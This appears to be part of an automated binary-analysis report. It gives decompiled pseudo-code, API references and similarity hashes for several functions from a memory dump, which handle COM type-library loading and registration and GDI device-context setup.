Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoQuery$CreateFromInstanceString
String ID: CLSID\$\Implemented Categories$\Required Categories
API String ID: 468587507-4092563799
Opcode ID: fe65d7a7482c76f2818ca9e40103eb089d449ba1f1aaa911e1f6fb454a198dc6
Instruction ID: cd1c548e4e7557d3558e872e9b8567ae290f2fc21d9758eaa6f1b10adbce825a
Opcode Fuzzy Hash: fe65d7a7482c76f2818ca9e40103eb089d449ba1f1aaa911e1f6fb454a198dc6
Instruction Fuzzy Hash: 51913C719002299BDF28DB65CC81BEEB3B9AF55300F5044A9FA09A7142DA309F85DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB43A8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00CB43A8(void* __ebx, struct HINSTANCE__* __ecx, void* __edi, void* __esi, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v18;
				char _v288;
				unsigned int _v292;
				char _v296;
				intOrPtr _v300;
				signed int* _v304;
				void* _v316;
				void* __ebp;
				signed int _t36;
				signed int* _t38;
				long _t42;
				unsigned int _t46;
				unsigned int _t47;
				void* _t50;
				unsigned int _t51;
				signed int _t52;
				char _t54;
				char _t55;
				unsigned int _t66;
				unsigned int _t67;
				void* _t68;
				signed int* _t75;
				intOrPtr _t86;
				unsigned int _t99;
				void* _t105;
				signed int _t106;
				void* _t107;
				void* _t109;
				void* _t111;

				_t36 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t36 ^ _t106;
				_t38 = _a4;
				_v304 = _t38;
				_t75 = _a8;
				if(_t38 == 0 || _t75 == 0) {
					goto L29;
				} else {
					 *_t38 =  *_t38 & 0x00000000;
					 *_t75 =  *_t75 & 0x00000000;
					_t105 = 0;
					_v296 = 0;
					_t42 = GetModuleFileNameA(__ecx,  &_v288, 0x104);
					if(_t42 != 0) {
						__eflags = _t42 - 0x104;
						if(_t42 != 0x104) {
							_v300 = E00CB4367( &_v288);
							_t46 = E00CDBFC0( &_v288) + 1;
							_t92 = _t46;
							_v292 = _t46;
							_t47 = E00CB1160( &_v292, _t46);
							_t109 = _t107 + 4;
							__eflags = _t47;
							if(_t47 < 0) {
								L24:
								_t99 = 0x8007000e;
								L26:
								while(_t105 != 0) {
									_t105 =  *_t105;
									E00CDC163(_t105);
								}
								L29:
								return E00CBDC11(_v8 ^ _t106);
							}
							_t100 = _v292;
							__eflags = _v292 - 0x400;
							if(__eflags > 0) {
								L10:
								_t50 = E00CB9AD3( &_v296, _t92, __eflags, _t100);
								_t105 = _v296;
								L11:
								_t51 = E00CB1255(_t50,  &_v288, _t100 >> 1, 3);
								_v292 = _t51;
								__eflags = _t51;
								if(_t51 == 0) {
									goto L24;
								}
								__imp__#161(_t51, _t75);
								_t99 = _t51;
								__eflags = _t99;
								if(_t99 >= 0) {
									L22:
									__imp__#2(_v292);
									 *_v304 = _t51;
									__eflags = _t51;
									if(_t51 == 0) {
										_t52 =  *_t75;
										_t99 = 0x8007000e;
										 *((intOrPtr*)( *_t52 + 8))(_t52);
										 *_t75 =  *_t75 & 0x00000000;
									}
									goto L26;
								}
								_t54 = ".tlb"; // 0x626c742e
								_t86 = _v300;
								_v16 = _t54;
								_t55 =  *0xd07a7c; // 0x0
								_v12 = _t55;
								__eflags = _t86 -  &_v288 + 5 - 0x104;
								if(_t86 -  &_v288 + 5 <= 0x104) {
									E00CB1447( &_v288, E00CDBF5B(_t86,  &_v18 - _t86,  &_v16));
									_t66 = E00CDBFC0( &_v288) + 1;
									_v292 = _t66;
									_t95 = _t66;
									_t67 = E00CB1160( &_v292, _t66);
									_t111 = _t109 + 0x14;
									__eflags = _t67;
									if(_t67 < 0) {
										goto L24;
									}
									_t102 = _v292;
									__eflags = _v292 - 0x400;
									if(__eflags > 0) {
										L19:
										_t68 = E00CB9AD3( &_v296, _t95, __eflags, _t102);
										_t105 = _v296;
										L20:
										_t51 = E00CB1255(_t68,  &_v288, _t102 >> 1, 3);
										_v292 = _t51;
										__eflags = _t51;
										if(_t51 == 0) {
											goto L24;
										}
										__imp__#161(_t51, _t75);
										_t99 = _t51;
										__eflags = _t99;
										if(_t99 < 0) {
											goto L26;
										}
										goto L22;
									}
									__eflags = E00CB11E1(_t102, __eflags);
									if(__eflags == 0) {
										goto L19;
									}
									E00CBEB70();
									_t68 = _t111;
									goto L20;
								}
								_t99 = 0x80004005;
								goto L26;
							}
							__eflags = E00CB11E1(_t100, __eflags);
							if(__eflags == 0) {
								goto L10;
							}
							E00CBEB70();
							_t50 = _t109;
							goto L11;
						}
						_t99 = 0x8007007a;
						goto L26;
					}
					_t99 = E00CB15CD();
					goto L26;
				}
			}

0x00cb43b1
0x00cb43b8
0x00cb43bb
0x00cb43be
0x00cb43c5
0x00cb43cc
0x00000000
0x00cb43da
0x00cb43da
0x00cb43e2
0x00cb43ed
0x00cb43f0
0x00cb43f6
0x00cb43fe
0x00cb440c
0x00cb440e
0x00cb4425
0x00cb4437
0x00cb443e
0x00cb4440
0x00cb4446
0x00cb444b
0x00cb444e
0x00cb4450
0x00cb45c0
0x00cb45c0
0x00000000
0x00cb45d0
0x00cb45c8
0x00cb45ca
0x00cb45cf
0x00cb45dd
0x00cb45f1
0x00cb45f1
0x00cb4456
0x00cb445c
0x00cb4462
0x00cb447a
0x00cb4481
0x00cb4486
0x00cb448c
0x00cb4499
0x00cb449e
0x00cb44a4
0x00cb44a6
0x00000000
0x00000000
0x00cb44ae
0x00cb44b4
0x00cb44b6
0x00cb44b8
0x00cb4596
0x00cb459c
0x00cb45a8
0x00cb45aa
0x00cb45ac
0x00cb45ae
0x00cb45b0
0x00cb45b8
0x00cb45bb
0x00cb45bb
0x00000000
0x00cb45ac
0x00cb44be
0x00cb44c9
0x00cb44cf
0x00cb44d2
0x00cb44d7
0x00cb44e1
0x00cb44e6
0x00cb4503
0x00cb4514
0x00cb451e
0x00cb4524
0x00cb4526
0x00cb452b
0x00cb452e
0x00cb4530
0x00000000
0x00000000
0x00cb4536
0x00cb453c
0x00cb4542
0x00cb455a
0x00cb4561
0x00cb4566
0x00cb456c
0x00cb4579
0x00cb457e
0x00cb4584
0x00cb4586
0x00000000
0x00000000
0x00cb458a
0x00cb4590
0x00cb4592
0x00cb4594
0x00000000
0x00000000
0x00000000
0x00cb4594
0x00cb454b
0x00cb454d
0x00000000
0x00000000
0x00cb4551
0x00cb4556
0x00000000
0x00cb4556
0x00cb44e8
0x00000000
0x00cb44e8
0x00cb446b
0x00cb446d
0x00000000
0x00000000
0x00cb4471
0x00cb4476
0x00000000
0x00cb4476
0x00cb4410
0x00000000
0x00cb4410
0x00cb4405
0x00000000
0x00cb4405

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00CB43F6

Part of subcall function 00CB15CD: GetLastError.KERNEL32(00CB2D80), ref: 00CB15CD

Strings

.tlb, xrefs: 00CB44BE

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastModuleName
String ID: .tlb
API String ID: 2776309574-1487266626
Opcode ID: 4e4c2d9ca3cc17dfc6ae2226da3245e9c04a685fb7a8dbc98444c89af3c3ea5e
Instruction ID: ae484f6f89f7323b58c496a5cb326ae2375658a80584904f09775b6f60fd770e
Opcode Fuzzy Hash: 4e4c2d9ca3cc17dfc6ae2226da3245e9c04a685fb7a8dbc98444c89af3c3ea5e
Instruction Fuzzy Hash: EE510372A042288BCB25DB64CC51BEE77B9EF48310F1401A5E94AE7252EB34DE55DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4ACE, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CB4ACE(void* __ebx, void* __ecx, void* __eflags) {
				signed int _v8;
				short _v10;
				char _v528;
				void* _v532;
				void* _v536;
				char _v540;
				void* __edi;
				void* __esi;
				signed int _t28;
				intOrPtr* _t33;
				intOrPtr* _t37;
				_Unknown_base(*)()* _t39;
				void* _t40;
				struct HINSTANCE__* _t41;
				void* _t45;
				intOrPtr* _t48;
				intOrPtr _t60;
				intOrPtr _t61;
				void* _t66;
				void* _t67;
				intOrPtr* _t70;
				char* _t72;
				intOrPtr* _t74;
				signed int _t77;
				signed int _t79;

				_t50 = __ebx;
				_t77 = _t79;
				_t28 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t28 ^ _t77;
				_push(_t66);
				_t72 = 0;
				_v540 = 0;
				_v536 = 0;
				_t67 = E00CB43A8(__ebx, __ecx, _t66, 0,  &_v540,  &_v536);
				if(_t67 < 0) {
					L10:
					_t33 = _v536;
					if(_t33 != 0) {
						 *((intOrPtr*)( *_t33 + 8))(_t33);
					}
					__imp__#6();
					return E00CBDC11(_v8 ^ _t77, _v540);
				} else {
					_t37 = _v536;
					_push( &_v532);
					_push(0);
					_push(0);
					_push(0);
					_v532 = 0;
					_push(0xffffffff);
					_push(_t37);
					if( *((intOrPtr*)( *_t37 + 0x24))() < 0 || _v532 == 0) {
						L5:
						if( *0xe3a40c != 1) {
							L8:
							_t39 = __imp__#163;
						} else {
							_t41 = GetModuleHandleW(L"OLEAUT32.DLL");
							if(_t41 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t41, "RegisterTypeLibForUser");
								if(_t39 == 0) {
									goto L8;
								}
							}
						}
						_t40 =  *_t39(_v536, _v540, _t72);
						_t67 = _t40;
						__imp__#6(_v532);
						goto L10;
					} else {
						__imp__#7(_v532);
						E00CB14BD( &_v528, _v532, _t38);
						_v10 = 0;
						_t45 = E00CB49A6( &_v528) + _t44;
						if(_t45 >= 0x208) {
							E00CBE08B();
							asm("int3");
							_t60 =  *0xe3a4bc; // 0xd0c4a0
							_push(0);
							_t74 =  *0xe3a4b8; // 0xd0c49c
							_push(_t67);
							__eflags = _t74 - _t60;
							if(__eflags >= 0) {
								L20:
								_t61 =  *0xe3a4b4; // 0xcb0000
								_t48 = E00CB4ACE(_t50, _t61, __eflags);
							} else {
								do {
									_t70 =  *_t74;
									__eflags = _t70;
									if(_t70 == 0) {
										goto L18;
									} else {
										_t48 =  *((intOrPtr*)(_t70 + 4))(1);
										__eflags = _t48;
										if(_t48 >= 0) {
											_t48 = E00CB45F4(_t50,  *_t70,  *((intOrPtr*)(_t70 + 0x18))(), _t70, _t74, 1);
											__eflags = _t48;
											if(_t48 >= 0) {
												_t60 =  *0xe3a4bc; // 0xd0c4a0
												goto L18;
											}
										}
									}
									goto L21;
									L18:
									_t74 = _t74 + 4;
									__eflags = _t74 - _t60;
								} while (_t74 < _t60);
								__eflags = _t48;
								if(__eflags >= 0) {
									goto L20;
								}
							}
							L21:
							return _t48;
						} else {
							_t72 =  &_v528;
							 *((short*)(_t77 + _t45 - 0x20c)) = 0;
							goto L5;
						}
					}
				}
			}

0x00cb4ace
0x00cb4acf
0x00cb4ad7
0x00cb4ade
0x00cb4ae2
0x00cb4ae9
0x00cb4af2
0x00cb4af9
0x00cb4b04
0x00cb4b08
0x00cb4bd0
0x00cb4bd0
0x00cb4bd8
0x00cb4bdd
0x00cb4bdd
0x00cb4be6
0x00cb4bfb
0x00cb4b0e
0x00cb4b0e
0x00cb4b1a
0x00cb4b1b
0x00cb4b1c
0x00cb4b1d
0x00cb4b1e
0x00cb4b26
0x00cb4b28
0x00cb4b2e
0x00cb4b86
0x00cb4b8d
0x00cb4bae
0x00cb4bae
0x00cb4b8f
0x00cb4b94
0x00cb4b9c
0x00000000
0x00cb4b9e
0x00cb4ba4
0x00cb4bac
0x00000000
0x00000000
0x00cb4bac
0x00cb4b9c
0x00cb4bc0
0x00cb4bc8
0x00cb4bca
0x00000000
0x00cb4b38
0x00cb4b3e
0x00cb4b51
0x00cb4b60
0x00cb4b69
0x00cb4b70
0x00cb4bfc
0x00cb4c01
0x00cb4c02
0x00cb4c0a
0x00cb4c0b
0x00cb4c11
0x00cb4c12
0x00cb4c14
0x00cb4c48
0x00cb4c48
0x00cb4c4e
0x00cb4c16
0x00cb4c16
0x00cb4c16
0x00cb4c18
0x00cb4c1a
0x00000000
0x00cb4c1c
0x00cb4c1e
0x00cb4c21
0x00cb4c23
0x00cb4c2e
0x00cb4c33
0x00cb4c35
0x00cb4c37
0x00000000
0x00cb4c37
0x00cb4c35
0x00cb4c23
0x00000000
0x00cb4c3d
0x00cb4c3d
0x00cb4c40
0x00cb4c40
0x00cb4c44
0x00cb4c46
0x00000000
0x00000000
0x00cb4c46
0x00cb4c53
0x00cb4c55
0x00cb4b76
0x00cb4b78
0x00cb4b7e
0x00000000
0x00cb4b7e
0x00cb4b70
0x00cb4b2e

APIs

Part of subcall function 00CB43A8: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00CB43F6

SysStringLen.OLEAUT32(?), ref: 00CB4B3E

Part of subcall function 00CB49A6: CharNextW.USER32 ref: 00CB49C0

GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00CB4B94
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00CB4BA4
SysFreeString.OLEAUT32(?), ref: 00CB4BCA
SysFreeString.OLEAUT32(?), ref: 00CB4BE6

Strings

OLEAUT32.DLL, xrefs: 00CB4B8F
RegisterTypeLibForUser, xrefs: 00CB4B9E

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: String$FreeModule$AddressCharFileHandleNameNextProc
String ID: OLEAUT32.DLL$RegisterTypeLibForUser
API String ID: 2012197027-2666564778
Opcode ID: a0b2537be1bb276468d1ee7d81068ea33213c35aa63c2d85b4bc1eb5f1df4e36
Instruction ID: 6e6041cdbb6025d98f6af3539a94f4c7df03334705ec1a98824224973cad5a87
Opcode Fuzzy Hash: a0b2537be1bb276468d1ee7d81068ea33213c35aa63c2d85b4bc1eb5f1df4e36
Instruction Fuzzy Hash: 2C41B331A042289FCB249B65DC4CBEE7B79EF54710F0001A9E919E3162DA70DE84CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB7A3A, Relevance: 12.1, APIs: 8, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00CB7A3A(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				struct tagPOINT _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int _v36;
				signed int _t36;
				struct HDC__* _t53;
				intOrPtr _t55;
				struct HDC__* _t66;
				void* _t68;
				intOrPtr* _t74;
				signed int _t78;

				_t68 = __edi;
				_t36 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t36 ^ _t78;
				_v28 = _v28 & 0x00000000;
				_t55 = _a4;
				_v32 = __ecx;
				_t66 =  *(_t55 + 0x14);
				if( *(_t55 + 0x10) == 0) {
					_t53 = E00CB625F(_t55,  *(_t55 + 0x14),  *((intOrPtr*)(_t55 + 0xc)), __edi, __esi);
					_t66 =  *(_t55 + 0x14);
					 *(_t55 + 0x10) = _t53;
					_v28 = 0 | _t53 != _t66;
				}
				_push(_t68);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t18 = GetDeviceCaps(_t66, 2) == 5;
				_v36 = 0 | _t18;
				if(_t18 != 0) {
					LPtoDP( *(_t55 + 0x14),  &_v24, 2);
					SaveDC( *(_t55 + 0x14));
					SetMapMode( *(_t55 + 0x14), 1);
					SetWindowOrgEx( *(_t55 + 0x14), 0, 0, 0);
					SetViewportOrgEx( *(_t55 + 0x14), 0, 0, 0);
					 *((intOrPtr*)(_t55 + 0x20)) = 1;
				}
				_t74 = _v32;
				 *((intOrPtr*)(_t55 + 0x18)) =  &_v24;
				E00CB79A7(_t74, _t55);
				 *((intOrPtr*)( *_t74 + 0x10))(_t55);
				if(_v28 != 0) {
					DeleteDC( *(_t55 + 0x10));
				}
				if(_v36 == 0) {
					RestoreDC( *(_t55 + 0x14), 0xffffffff);
				}
				return E00CBDC11(_v8 ^ _t78);
			}

0x00cb7a3a
0x00cb7a40
0x00cb7a47
0x00cb7a4a
0x00cb7a4f
0x00cb7a53
0x00cb7a5a
0x00cb7a5d
0x00cb7a65
0x00cb7a6a
0x00cb7a71
0x00cb7a77
0x00cb7a77
0x00cb7a7d
0x00cb7a83
0x00cb7a85
0x00cb7a86
0x00cb7a87
0x00cb7a93
0x00cb7a96
0x00cb7a99
0x00cb7aa4
0x00cb7aad
0x00cb7aba
0x00cb7ac8
0x00cb7ad4
0x00cb7ada
0x00cb7ada
0x00cb7add
0x00cb7ae6
0x00cb7ae9
0x00cb7af3
0x00cb7afd
0x00cb7b02
0x00cb7b02
0x00cb7b0c
0x00cb7b13
0x00cb7b13
0x00cb7b28

APIs

GetDeviceCaps.GDI32(?,00000002), ref: 00CB7A88
LPtoDP.GDI32(?,?,00000002), ref: 00CB7AA4
SaveDC.GDI32(?), ref: 00CB7AAD
SetMapMode.GDI32(?,00000001), ref: 00CB7ABA
SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 00CB7AC8
SetViewportOrgEx.GDI32(?,00000000,00000000,00000000), ref: 00CB7AD4
DeleteDC.GDI32(00000000), ref: 00CB7B02
RestoreDC.GDI32(?,000000FF), ref: 00CB7B13

Part of subcall function 00CB625F: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CB644B

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeleteDeviceModeRestoreSaveViewportWindow
String ID:
API String ID: 913143675-0
Opcode ID: e10e89d7fc121ac2349c57eec5b218e7427efeb7618e37571f602c683885acd5
Instruction ID: 05c2ca0be7aed166d115999f02792ae07080fe1ea01fe2dd0c7f119655b4fc0e
Opcode Fuzzy Hash: e10e89d7fc121ac2349c57eec5b218e7427efeb7618e37571f602c683885acd5
Instruction Fuzzy Hash: F5316A31500114ABCF18DF65ED89FAF7FB9FF88711F104169E901AA2A6CB70D950DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CB55B2, Relevance: 10.7, APIs: 7, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00CB55B2(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				intOrPtr _t65;
				struct _CRITICAL_SECTION* _t66;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				signed int _t82;
				signed int _t85;
				signed int _t86;
				long _t94;
				unsigned int _t97;
				signed int _t98;
				void* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr* _t109;
				intOrPtr* _t130;
				signed int _t132;
				void* _t133;
				void* _t134;
				void* _t136;

				_t127 = __edx;
				_t109 = __ecx;
				_push(0x120);
				E00CFBF2E(0xcfccea, __ebx, __edi);
				_t130 = _t109;
				if( *(_t130 + 0xc) == 0 ||  *(_t130 + 0x14) == 0) {
					_t65 =  *0xe3a408; // 0xe3a50c
					_t66 = _t65 + 0x10;
					 *(_t133 - 0x12c) = _t66;
					 *((intOrPtr*)(_t133 - 4)) = 0;
					EnterCriticalSection(_t66);
					_t67 =  *(_t130 + 0xc);
					_t106 = 0x80004005;
					 *((char*)(_t133 - 0x128)) = 1;
					__eflags = _t67;
					if(_t67 != 0) {
						_t106 = 0;
						__eflags = 0;
						L37:
						__eflags = _t67;
						if(_t67 != 0) {
							__eflags =  *(_t130 + 0x14);
							if(__eflags == 0) {
								_push(_t67);
								_t106 = E00CB53BC(_t106, _t130, _t127, _t130, __eflags);
							}
						}
						L40:
						LeaveCriticalSection( *(_t133 - 0x12c));
						_t68 = _t106;
						goto L41;
					}
					 *(_t133 - 0x124) =  *(_t133 - 0x124) & _t67;
					_t127 =  *((intOrPtr*)(_t130 + 4));
					_t71 = E00CB10E3(0xe3a410, _t127);
					__eflags = _t71;
					if(_t71 == 0) {
						L22:
						_t74 =  *(_t130 + 8) & 0x0000ffff;
						__imp__#162(_t127, _t74,  *(_t130 + 0xa) & 0x0000ffff,  *((intOrPtr*)(_t133 + 8)), _t133 - 0x124);
						_t106 = _t74;
						L23:
						__eflags = _t106;
						if(_t106 >= 0) {
							 *(_t133 - 0x118) =  *(_t133 - 0x118) & 0x00000000;
							 *((char*)(_t133 - 4)) = 2;
							_t127 = _t133 - 0x118;
							_t75 =  *(_t133 - 0x124);
							_t106 =  *((intOrPtr*)( *_t75 + 0x18))(_t75,  *_t130, _t133 - 0x118);
							__eflags = _t106;
							if(_t106 >= 0) {
								_t81 =  *(_t133 - 0x118);
								 *(_t133 - 0x120) = _t81;
								__eflags = _t81;
								if(_t81 != 0) {
									 *((intOrPtr*)( *_t81 + 4))(_t81);
									_t81 =  *(_t133 - 0x118);
								}
								 *(_t133 - 0x11c) =  *(_t133 - 0x11c) & 0x00000000;
								_t127 = _t133 - 0x11c;
								 *((char*)(_t133 - 4)) = 4;
								_t116 =  *_t81;
								_t82 =  *((intOrPtr*)( *_t81))(_t81, 0xd07c28, _t133 - 0x11c);
								__eflags = _t82;
								if(_t82 >= 0) {
									_t116 = _t133 - 0x120;
									E00CBAD77(_t133 - 0x120, _t133 - 0x11c);
								}
								 *(_t133 - 0x120) =  *(_t133 - 0x120) & 0x00000000;
								 *(_t130 + 0xc) =  *(_t133 - 0x120);
								E00CB247E(_t116, _t130);
								 *((char*)(_t133 - 4)) = 3;
								_t85 =  *(_t133 - 0x11c);
								__eflags = _t85;
								if(_t85 != 0) {
									 *((intOrPtr*)( *_t85 + 8))(_t85);
								}
								 *((char*)(_t133 - 4)) = 2;
								_t86 =  *(_t133 - 0x120);
								__eflags = _t86;
								if(_t86 != 0) {
									 *((intOrPtr*)( *_t86 + 8))(_t86);
								}
							}
							_t77 =  *(_t133 - 0x124);
							 *((intOrPtr*)( *_t77 + 8))(_t77);
							 *((char*)(_t133 - 4)) = 0;
							_t79 =  *(_t133 - 0x118);
							__eflags = _t79;
							if(_t79 != 0) {
								 *((intOrPtr*)( *_t79 + 8))(_t79);
							}
						}
						L35:
						_t67 =  *(_t130 + 0xc);
						goto L37;
					}
					__eflags =  *(_t130 + 8) - 0xffff;
					if( *(_t130 + 8) != 0xffff) {
						goto L22;
					}
					__eflags =  *(_t130 + 0xa) - 0xffff;
					if( *(_t130 + 0xa) != 0xffff) {
						goto L22;
					}
					_t94 = GetModuleFileNameA( *0xe3910c, _t133 - 0x114, 0x104);
					__eflags = _t94;
					if(_t94 == 0) {
						goto L35;
					}
					__eflags = _t94 - 0x104;
					if(_t94 == 0x104) {
						goto L35;
					}
					_t132 = 0;
					 *(_t133 - 0x118) = 0;
					 *((char*)(_t133 - 4)) = 1;
					_t97 = E00CDBFC0(_t133 - 0x114) + 1;
					_t128 = _t97;
					 *(_t133 - 0x11c) = _t97;
					_t98 = E00CB1160(_t133 - 0x11c, _t97);
					_t136 = _t134 + 4;
					__eflags = _t98;
					if(_t98 < 0) {
						L18:
						_t106 = 0x8007000e;
						goto L40;
					}
					_t107 =  *(_t133 - 0x11c);
					__eflags =  *(_t133 - 0x11c) - 0x400;
					if(__eflags > 0) {
						L13:
						_t99 = E00CB9AD3(_t133 - 0x118, _t128, __eflags, _t107);
						_t132 =  *(_t133 - 0x118);
						L14:
						_t127 = _t133 - 0x114;
						_t100 = E00CB1255(_t99, _t133 - 0x114, _t107 >> 1, 3);
						__eflags = _t100;
						if(_t100 == 0) {
							L17:
							__eflags = _t132;
							if(_t132 != 0) {
								_t132 =  *_t132;
								E00CDC163(_t132);
								goto L17;
							}
							goto L18;
						} else {
							__imp__#161(_t100, _t133 - 0x124);
							_t106 = _t100;
							 *((char*)(_t133 - 4)) = 0;
							while(1) {
								__eflags = _t132;
								if(_t132 == 0) {
									break;
								}
								_t132 =  *_t132;
								E00CDC163(_t132);
							}
							goto L23;
						}
					}
					__eflags = E00CB11E1(_t107, __eflags);
					if(__eflags == 0) {
						goto L13;
					} else {
						E00CBEB70();
						_t99 = _t136;
						goto L14;
					}
				} else {
					_t68 = 0;
					L41:
					return E00CFBED8(_t68, _t106, _t130);
				}
			}

0x00cb55b2
0x00cb55b2
0x00cb55b2
0x00cb55bc
0x00cb55c1
0x00cb55c8
0x00cb55d6
0x00cb55db
0x00cb55de
0x00cb55e5
0x00cb55e8
0x00cb55ee
0x00cb55f1
0x00cb55f6
0x00cb55fd
0x00cb55ff
0x00cb581e
0x00cb581e
0x00cb5820
0x00cb5820
0x00cb5822
0x00cb5824
0x00cb5828
0x00cb582a
0x00cb5832
0x00cb5832
0x00cb5828
0x00cb5834
0x00cb583a
0x00cb5840
0x00000000
0x00cb5840
0x00cb5605
0x00cb5610
0x00cb5613
0x00cb5618
0x00cb561a
0x00cb571d
0x00cb572c
0x00cb5732
0x00cb5738
0x00cb573a
0x00cb573a
0x00cb573c
0x00cb5742
0x00cb5749
0x00cb574d
0x00cb5753
0x00cb5762
0x00cb5764
0x00cb5766
0x00cb576c
0x00cb5772
0x00cb5778
0x00cb577a
0x00cb577f
0x00cb5782
0x00cb5782
0x00cb5788
0x00cb578f
0x00cb5795
0x00cb5799
0x00cb57a2
0x00cb57a4
0x00cb57a6
0x00cb57af
0x00cb57b5
0x00cb57b5
0x00cb57c0
0x00cb57c9
0x00cb57cc
0x00cb57d1
0x00cb57d5
0x00cb57db
0x00cb57dd
0x00cb57e2
0x00cb57e2
0x00cb57e5
0x00cb57e9
0x00cb57ef
0x00cb57f1
0x00cb57f6
0x00cb57f6
0x00cb57f1
0x00cb57f9
0x00cb5802
0x00cb5805
0x00cb5809
0x00cb580f
0x00cb5811
0x00cb5816
0x00cb5816
0x00cb5811
0x00cb5819
0x00cb5819
0x00000000
0x00cb5819
0x00cb5625
0x00cb5629
0x00000000
0x00000000
0x00cb562f
0x00cb5633
0x00000000
0x00000000
0x00cb564c
0x00cb5652
0x00cb5654
0x00000000
0x00000000
0x00cb565a
0x00cb565c
0x00000000
0x00000000
0x00cb5662
0x00cb5664
0x00cb5670
0x00cb567a
0x00cb5681
0x00cb5683
0x00cb5689
0x00cb568e
0x00cb5691
0x00cb5693
0x00cb5704
0x00cb5704
0x00000000
0x00cb5704
0x00cb5695
0x00cb569b
0x00cb56a1
0x00cb56b9
0x00cb56c0
0x00cb56c5
0x00cb56cb
0x00cb56cf
0x00cb56d8
0x00cb56dd
0x00cb56df
0x00cb5700
0x00cb5700
0x00cb5702
0x00cb56f8
0x00cb56fa
0x00000000
0x00cb56ff
0x00000000
0x00cb56e1
0x00cb56e9
0x00cb56ef
0x00cb56f1
0x00cb5717
0x00cb5717
0x00cb5719
0x00000000
0x00000000
0x00cb570f
0x00cb5711
0x00cb5716
0x00000000
0x00cb571b
0x00cb56df
0x00cb56aa
0x00cb56ac
0x00000000
0x00cb56ae
0x00cb56b0
0x00cb56b5
0x00000000
0x00cb56b5
0x00cb55cf
0x00cb55cf
0x00cb5842
0x00cb584d
0x00cb584d

APIs

__EH_prolog3_GS.LIBCMT ref: 00CB55BC
EnterCriticalSection.KERNEL32(00E3A4FC,00000120,00CB527A,?), ref: 00CB55E8
GetModuleFileNameA.KERNEL32(?,00000104), ref: 00CB564C
_strlen.LIBCMT ref: 00CB5675
LoadTypeLib.OLEAUT32(00000000,?), ref: 00CB56E9
LeaveCriticalSection.KERNEL32(?), ref: 00CB583A

Memory Dump Source

